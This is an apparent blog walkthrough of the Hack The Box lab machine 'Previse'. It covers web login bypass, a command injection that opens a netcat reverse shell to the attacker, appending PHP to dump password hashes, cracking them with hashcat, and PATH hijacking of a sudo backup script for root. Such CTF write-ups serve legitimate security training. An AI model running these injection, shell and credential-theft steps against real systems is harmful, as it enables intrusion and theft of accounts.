HTB Previse - HackHouse

Hack The Box walkthrough

IP address: 10.10.11.104

Welcome to Previse write up! This box is a little tricky on user flag but it forces you to think out of bounds.

User own

Let’s start with nmap using the following options:

-sV for version detection;
-O for operating system detection.

The latest option requires root privileges to work properly, so use sudo.

└─$ sudo nmap -sV -O 10.10.11.104
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 00:00 CEST
Nmap scan report for 10.10.11.104
Host is up (0.029s latency).
Not shown: 998 closed ports

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

Note: I’ve done some research on these versions and a directory bruteforcing but there was nothing useful here.

Let’s explore the web application running on port 80.

It seems to be a php web application that redirects to a login page.

When using curl, it’is possible to get the real response page from the webapp because curl does not follow redirects by default.

curl -is -X GET 10.10.11.104/index.php

Ehi, we’ve got a different page here: the index page. The index page includes a navigation menu with relative paths to the other pages of web application.

Let’s explore something interesting: accounts.php.

curl -is -X GET 10.10.11.104/accounts.php

In that page there is a form (targeting on the same page) with 3 input fields:

username;
password;
confirm.

Oh, and usernames and passwords must be between 5 and 32 characters.

We need to forge a specific curl request using POST to create the new user hacker.

curl -is -X POST -d "username=hacker&password=hacker&confirm=hacker" 10.10.11.104/accounts.php

Ok, let’s try to login with our new credentials: hacker/hacker.

And we’re in!

Now, there are some relevant sections here. Take your time to explore the website. I’ve downloaded a log file that gives me information about another user m4lwhere. There is a form to upload a new file to the system and it is possible to download a backup of the entire web site.

This is the key of the entire hacking operation.

We can click on the file name to download that zip.

Once we’ve unzipped it, we can watch deeply at the web application code.

Look at file_logs.php: there is a form to logs.php to download a log file and, internally, it uses python to parse a parameter called delimeter.

We can move to section management menu > log data, then we can edit that parameter to create something useful for our hack.

Set this command as a value of delimeter parameter comma && nc -e /bin/bash <my ip> 1234. This will launch a reverse remote shell usingnetcat to port 1234.

Note: This kind of attack is called Command injection.

So, let’s setup a netcat listener on your attacker box with the following command:

nc -lvp 1234

Next, we can inject the code directly into the select using browser tools (from the log data page, click using the right button on the select of the file delimeter parameter and select inspect).

We know exactly what we are doing 🙂

The netcat listener will now be responding as expected: we’ve got a reverse shell with target system as www-data user.

To find the first flag, we can list the m4lwhere home directory and inside of it, we will find a file called user.txt. Unfortunately that file was readable exclusively by m4lwhere.

So, we need to connect as m4lwhere to read the flag. We can modify a page of the web site to get all the user from database in order to obtain the password hashes.

Let’s append this script to status.php file:

<?php
$db = connectDB();

$query = "SELECT username, password FROM accounts";
$users = $db->query($query);

if ($users->num_rows > 0) {
    while($row = mysqli_fetch_assoc($users)) {
      var_dump($row);
    }
  }

$db->close();

We need to join the lines with our editor and append the result to status.php through the shell using this command:

echo '<code>' >> status.php

Next, we can refresh the status page to get the results.

So the m4lwhere’s password hash is:

$1$🧂llol$DQpmdvnb7EeuO6UaqRItf

Note: Look at the image: I’ve got other players information too. There are even the credentials we used to log in.

Ok, we’ve got the password hash. Let’s reverse it using hashcat.

Note: Usually, the difficulty with hash reversing process is to find the right hash format. This page shows generic hash types.

Hashcat uses the following format code to manage hash with salt in $1$ format.

500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)

Launch hashcat using the command:

hashcat $1$🧂llol$DQpmdvnb7EeuO6UaqRItf rockyou.txt -m 500

and, after some time, it will show the corresponding password.

$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!

Now the question is: is this password the same of the system user m4lwhere? Let’s find out using ssh and these credentials:

username: m4lwhere
password: ilovecody112235!

ssh m4lwhere@10.10.11.104

It works!

We’re able to get the flag from the user’s home directory.

System own

First of all, once we need to connect through SSH as m4lwhere user.

We can take a look at sudo permissions:

m4lwhere@previse:/tmp$ sudo -l

User m4lwhere may run the following commands on previse:

(root) /opt/scripts/access_backup.sh

It seems that access_backup.sh script can be run as root by m4lwhere. If we open the script, we can see that it uses gzip command to create backups.

Let’s replace the system gzip with a custom one. We can create a gzip executable file into /tmp directory with the following content:

sudo /bin/bash -c "cat /root/*" | tee rootfolder.txt

This uses a single bash command to cat everything inside root folder and pipe to the file rootfolder.txt.

Next, we need to edit the system variable PATH in a way that the first dir the system is looking for a command is /tmp.

export PATH=/tmp:$PATH

Run the backup script using sudo.

sudo /opt/scripts/access_backup.sh

And then cat the content of our file.

cat rootfolder.txt

This gives us the root flag.

Well Done!

Mattia Peretti

Hackhouse.net author

Related